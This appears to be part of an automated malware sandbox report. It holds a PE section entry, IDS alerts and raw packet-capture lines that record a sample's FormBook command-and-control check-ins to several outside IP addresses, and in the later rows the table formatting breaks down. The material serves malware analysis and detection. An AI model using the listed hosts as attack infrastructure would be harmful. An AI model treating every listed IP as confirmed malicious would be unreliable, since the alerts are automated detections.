| .text | 0x1000 | 0x457a4 | 0x45800 | 637e5af39854f7e15d1c07ce182ebe1e | False | 0.9891489152428058 | data | 7.995583264592467 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |


| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-11-12T18:33:31.413900+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 52.149.20.212 | 443 | 192.168.2.8 | 49706 | TCP |
| 2024-11-12T18:33:43.956038+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49713 | 35.156.117.131 | 80 | TCP |
| 2024-11-12T18:34:00.030555+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49714 | 3.33.130.190 | 80 | TCP |
| 2024-11-12T18:34:02.649993+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49715 | 3.33.130.190 | 80 | TCP |
| 2024-11-12T18:34:05.195958+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49716 | 3.33.130.190 | 80 | TCP |
| 2024-11-12T18:34:07.739792+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49717 | 3.33.130.190 | 80 | TCP |
| 2024-11-12T18:34:10.131403+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 52.149.20.212 | 443 | 192.168.2.8 | 49718 | TCP |
| 2024-11-12T18:34:21.637687+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49719 | 3.33.130.190 | 80 | TCP |
| 2024-11-12T18:34:24.294717+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49720 | 3.33.130.190 | 80 | TCP |
| 2024-11-12T18:34:26.917164+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49721 | 3.33.130.190 | 80 | TCP |
| 2024-11-12T18:34:30.597777+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49722 | 3.33.130.190 | 80 | TCP |
| 2024-11-12T18:34:37.402392+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49747 | 206.119.82.134 | 80 | TCP |
| 2024-11-12T18:34:40.480678+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49762 | 206.119.82.134 | 80 | TCP |
| 2024-11-12T18:34:42.611762+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49770 | 206.119.82.134 | 80 | TCP |
| 2024-11-12T18:34:45.340269+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49783 | 206.119.82.134 | 80 | TCP |
| 2024-11-12T18:34:51.307912+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49806 | 162.213.249.216 | 80 | TCP |
| 2024-11-12T18:34:53.923000+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49815 | 162.213.249.216 | 80 | TCP |
| 2024-11-12T18:34:56.552188+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49822 | 162.213.249.216 | 80 | TCP |
| 2024-11-12T18:34:59.204438+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49831 | 162.213.249.216 | 80 | TCP |
| 2024-11-12T18:35:05.183868+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49850 | 217.160.0.231 | 80 | TCP |
| 2024-11-12T18:35:07.821672+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49860 | 217.160.0.231 | 80 | TCP |
| 2024-11-12T18:35:10.528161+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49872 | 217.160.0.231 | 80 | TCP |
| 2024-11-12T18:35:13.682504+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49885 | 217.160.0.231 | 80 | TCP |
| 2024-11-12T18:35:20.340272+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49921 | 54.179.173.60 | 80 | TCP |
| 2024-11-12T18:35:22.840113+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49935 | 54.179.173.60 | 80 | TCP |
| 2024-11-12T18:35:25.465126+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49948 | 54.179.173.60 | 80 | TCP |
| 2024-11-12T18:35:28.090174+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49961 | 54.179.173.60 | 80 | TCP |
| 2024-11-12T18:35:33.829472+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49989 | 3.33.130.190 | 80 | TCP |
| 2024-11-12T18:35:36.354898+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49999 | 3.33.130.190 | 80 | TCP |
| 2024-11-12T18:35:38.903628+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 50006 | 3.33.130.190 | 80 | TCP |
| 2024-11-12T18:35:41.457326+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 50007 | 3.33.130.190 | 80 | TCP |
| 2024-11-12T18:35:55.781092+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 50008 | 156.226.22.233 | 80 | TCP |
| 2024-11-12T18:35:58.435367+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 50009 | 156.226.22.233 | 80 | TCP |
| 2024-11-12T18:36:01.027844+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 50010 | 156.226.22.233 | 80 | TCP |
| 2024-11-12T18:36:03.668475+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 50011 | 156.226.22.233 | 80 | TCP |
| 2024-11-12T18:36:09.724598+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 50012 | 52.20.84.62 | 80 | TCP |
| 2024-11-12T18:36:12.298490+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 50013 | 52.20.84.62 | 80 | TCP |
| 2024-11-12T18:36:14.833492+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 50014 | 52.20.84.62 | 80 | TCP |
| 2024-11-12T18:36:17.395127+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 50015 | 52.20.84.62 | 80 | TCP |
| 2024-11-12T18:36:24.358877+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 53751 | 3.33.130.190 | 80 | TCP |
| 2024-11-12T18:36:26.934226+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 53752 | 3.33.130.190 | 80 | TCP |
| 2024-11-12T18:36:29.471616+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 53753 | 3.33.130.190 | 80 | TCP |
| 2024-11-12T18:36:32.063113+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 53754 | 3.33.130.190 | 80 | TCP |
| 2024-11-12T18:36:38.325576+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 53755 | 142.250.185.179 | 80 | TCP |
| 2024-11-12T18:36:40.918665+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 53756 | 142.250.185.179 | 80 | TCP |
| 2024-11-12T18:36:43.487336+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 53757 | 142.250.185.179 | 80 | TCP |
| 2024-11-12T18:36:45.965548+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 53758 | 142.250.185.179 | 80 | TCP |
| 2024-11-12T18:36:52.687626+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 53759 | 172.81.61.224 | 80 | TCP |
| 2024-11-12T18:36:55.293841+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 53760 | 172.81.61.224 | 80 | TCP |
                                                                                                                                                            2024-11-12T18:36:57.840790+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.853761172.81.61.22480TCP
                                                                                                                                                            2024-11-12T18:37:07.373757+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.853762172.81.61.22480TCP
                                                                                                                                                            2024-11-12T18:37:13.050869+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.8537633.33.130.19080TCP
                                                                                                                                                            2024-11-12T18:37:15.611386+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.8537643.33.130.19080TCP
                                                                                                                                                            2024-11-12T18:37:18.163807+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.8537653.33.130.19080TCP
                                                                                                                                                            2024-11-12T18:37:22.563162+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.8537663.33.130.19080TCP
                                                                                                                                                            2024-11-12T18:37:32.004901+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.85376735.156.117.13180TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                            Nov 12, 2024 18:34:45.340217113 CET8049783206.119.82.134192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:45.340269089 CET4978380192.168.2.8206.119.82.134
                                                                                                                                                            Nov 12, 2024 18:34:45.341773987 CET4978380192.168.2.8206.119.82.134
                                                                                                                                                            Nov 12, 2024 18:34:45.349168062 CET8049783206.119.82.134192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:50.543162107 CET4980680192.168.2.8162.213.249.216
                                                                                                                                                            Nov 12, 2024 18:34:50.548057079 CET8049806162.213.249.216192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:50.548130035 CET4980680192.168.2.8162.213.249.216
                                                                                                                                                            Nov 12, 2024 18:34:50.563554049 CET4980680192.168.2.8162.213.249.216
                                                                                                                                                            Nov 12, 2024 18:34:50.568538904 CET8049806162.213.249.216192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:51.269753933 CET8049806162.213.249.216192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:51.307854891 CET8049806162.213.249.216192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:51.307912111 CET4980680192.168.2.8162.213.249.216
                                                                                                                                                            Nov 12, 2024 18:34:52.074549913 CET4980680192.168.2.8162.213.249.216
                                                                                                                                                            Nov 12, 2024 18:34:53.170500994 CET4981580192.168.2.8162.213.249.216
                                                                                                                                                            Nov 12, 2024 18:34:53.175662994 CET8049815162.213.249.216192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:53.179085970 CET4981580192.168.2.8162.213.249.216
                                                                                                                                                            Nov 12, 2024 18:34:53.195826054 CET4981580192.168.2.8162.213.249.216
                                                                                                                                                            Nov 12, 2024 18:34:53.200838089 CET8049815162.213.249.216192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:53.882500887 CET8049815162.213.249.216192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:53.922939062 CET8049815162.213.249.216192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:53.923000097 CET4981580192.168.2.8162.213.249.216
                                                                                                                                                            Nov 12, 2024 18:34:54.699449062 CET4981580192.168.2.8162.213.249.216
                                                                                                                                                            Nov 12, 2024 18:34:55.793468952 CET4982280192.168.2.8162.213.249.216
                                                                                                                                                            Nov 12, 2024 18:34:55.798463106 CET8049822162.213.249.216192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:55.799094915 CET4982280192.168.2.8162.213.249.216
                                                                                                                                                            Nov 12, 2024 18:34:55.916640043 CET4982280192.168.2.8162.213.249.216
                                                                                                                                                            Nov 12, 2024 18:34:55.921818972 CET8049822162.213.249.216192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:55.921883106 CET8049822162.213.249.216192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:56.514447927 CET8049822162.213.249.216192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:56.552082062 CET8049822162.213.249.216192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:56.552187920 CET4982280192.168.2.8162.213.249.216
                                                                                                                                                            Nov 12, 2024 18:34:57.433834076 CET4982280192.168.2.8162.213.249.216
                                                                                                                                                            Nov 12, 2024 18:34:58.455238104 CET4983180192.168.2.8162.213.249.216
                                                                                                                                                            Nov 12, 2024 18:34:58.460398912 CET8049831162.213.249.216192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:58.460481882 CET4983180192.168.2.8162.213.249.216
                                                                                                                                                            Nov 12, 2024 18:34:58.470088959 CET4983180192.168.2.8162.213.249.216
                                                                                                                                                            Nov 12, 2024 18:34:58.475018978 CET8049831162.213.249.216192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:59.166017056 CET8049831162.213.249.216192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:59.204207897 CET8049831162.213.249.216192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:59.204437971 CET4983180192.168.2.8162.213.249.216
                                                                                                                                                            Nov 12, 2024 18:34:59.207374096 CET4983180192.168.2.8162.213.249.216
                                                                                                                                                            Nov 12, 2024 18:34:59.212562084 CET8049831162.213.249.216192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:04.263602018 CET4985080192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:04.268616915 CET8049850217.160.0.231192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:04.268721104 CET4985080192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:04.288039923 CET4985080192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:04.292834997 CET8049850217.160.0.231192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:05.120455980 CET8049850217.160.0.231192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:05.183867931 CET4985080192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:05.247797966 CET8049850217.160.0.231192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:05.247936964 CET4985080192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:05.793368101 CET4985080192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:06.813200951 CET4986080192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:06.818300009 CET8049860217.160.0.231192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:06.818895102 CET4986080192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:06.831748009 CET4986080192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:06.836594105 CET8049860217.160.0.231192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:07.671664000 CET8049860217.160.0.231192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:07.821341991 CET8049860217.160.0.231192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:07.821671963 CET4986080192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:08.340173006 CET4986080192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:09.362576962 CET4987280192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:09.604799986 CET8049872217.160.0.231192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:09.604926109 CET4987280192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:09.619227886 CET4987280192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:09.625163078 CET8049872217.160.0.231192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:09.625535965 CET8049872217.160.0.231192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:10.482788086 CET8049872217.160.0.231192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:10.528161049 CET4987280192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:10.603713036 CET8049872217.160.0.231192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:10.603792906 CET4987280192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:11.121457100 CET4987280192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:12.141588926 CET4988580192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:12.147324085 CET8049885217.160.0.231192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:12.147466898 CET4988580192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:12.157274961 CET4988580192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:12.162892103 CET8049885217.160.0.231192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:13.682293892 CET8049885217.160.0.231192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:13.682308912 CET8049885217.160.0.231192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:13.682321072 CET8049885217.160.0.231192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:13.682342052 CET8049885217.160.0.231192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:13.682354927 CET8049885217.160.0.231192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:13.682503939 CET4988580192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:13.682503939 CET4988580192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:13.682576895 CET4988580192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:13.683923006 CET8049885217.160.0.231192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:13.685405016 CET4988580192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:13.685975075 CET4988580192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:13.687825918 CET8049885217.160.0.231192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:13.687927008 CET4988580192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:13.690876007 CET8049885217.160.0.231192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:19.206497908 CET4992180192.168.2.854.179.173.60
                                                                                                                                                            Nov 12, 2024 18:35:19.211445093 CET804992154.179.173.60192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:19.211518049 CET4992180192.168.2.854.179.173.60
                                                                                                                                                            Nov 12, 2024 18:35:19.232404947 CET4992180192.168.2.854.179.173.60
                                                                                                                                                            Nov 12, 2024 18:35:19.237622976 CET804992154.179.173.60192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:20.212279081 CET804992154.179.173.60192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:20.340271950 CET4992180192.168.2.854.179.173.60
                                                                                                                                                            Nov 12, 2024 18:35:20.414923906 CET804992154.179.173.60192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:20.417272091 CET4992180192.168.2.854.179.173.60
                                                                                                                                                            Nov 12, 2024 18:35:20.746675014 CET4992180192.168.2.854.179.173.60
                                                                                                                                                            Nov 12, 2024 18:35:21.767177105 CET4993580192.168.2.854.179.173.60
                                                                                                                                                            Nov 12, 2024 18:35:21.772799969 CET804993554.179.173.60192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:21.775228024 CET4993580192.168.2.854.179.173.60
                                                                                                                                                            Nov 12, 2024 18:35:21.789608002 CET4993580192.168.2.854.179.173.60
                                                                                                                                                            Nov 12, 2024 18:35:21.794661999 CET804993554.179.173.60192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:22.784611940 CET804993554.179.173.60192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:22.840112925 CET4993580192.168.2.854.179.173.60
                                                                                                                                                            Nov 12, 2024 18:35:22.991096973 CET804993554.179.173.60192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:22.991149902 CET4993580192.168.2.854.179.173.60
                                                                                                                                                            Nov 12, 2024 18:35:23.293440104 CET4993580192.168.2.854.179.173.60
                                                                                                                                                            Nov 12, 2024 18:35:24.312488079 CET4994880192.168.2.854.179.173.60
                                                                                                                                                            Nov 12, 2024 18:35:24.319135904 CET804994854.179.173.60192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:24.319322109 CET4994880192.168.2.854.179.173.60
                                                                                                                                                            Nov 12, 2024 18:35:24.335207939 CET4994880192.168.2.854.179.173.60
                                                                                                                                                            Nov 12, 2024 18:35:24.362366915 CET804994854.179.173.60192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:24.362384081 CET804994854.179.173.60192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:25.321352959 CET804994854.179.173.60192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:25.465126038 CET4994880192.168.2.854.179.173.60
                                                                                                                                                            Nov 12, 2024 18:35:25.523438931 CET804994854.179.173.60192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:25.523521900 CET4994880192.168.2.854.179.173.60
                                                                                                                                                            Nov 12, 2024 18:35:25.841634035 CET4994880192.168.2.854.179.173.60
                                                                                                                                                            Nov 12, 2024 18:35:26.861243010 CET4996180192.168.2.854.179.173.60
                                                                                                                                                            Nov 12, 2024 18:35:26.866466999 CET804996154.179.173.60192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:26.866543055 CET4996180192.168.2.854.179.173.60
                                                                                                                                                            Nov 12, 2024 18:35:26.877439976 CET4996180192.168.2.854.179.173.60
                                                                                                                                                            Nov 12, 2024 18:36:10.082799911 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:10.082844019 CET5001280192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:10.082899094 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:10.082911015 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:10.082926035 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:10.082971096 CET5001280192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:10.574903965 CET5001280192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:11.601532936 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:11.606647015 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:11.607527971 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:11.619322062 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:11.624217987 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.298301935 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.298440933 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.298490047 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:12.298656940 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.298669100 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.298712969 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:12.299247980 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.299259901 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.299273968 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.299293041 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:12.300129890 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.300141096 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.300152063 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.300168037 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:12.300189018 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:12.303597927 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.303993940 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.304029942 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:12.417288065 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.417418957 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.417433023 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.417468071 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:12.417969942 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.417980909 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.417993069 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.418010950 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:12.418030024 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:12.418879032 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.418890953 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.418909073 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.418920994 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.418956041 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:12.418973923 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:12.419962883 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.419974089 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.419991016 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.420017958 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:12.465389967 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:12.536076069 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.536119938 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.536133051 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.536202908 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:12.536578894 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.536590099 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.536612988 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:12.537147045 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.537158012 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.537170887 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.537189960 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:12.537204027 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:12.537944078 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.537956953 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.538012981 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:12.538360119 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.538372993 CET805001352.20.84.62192.168.2.8
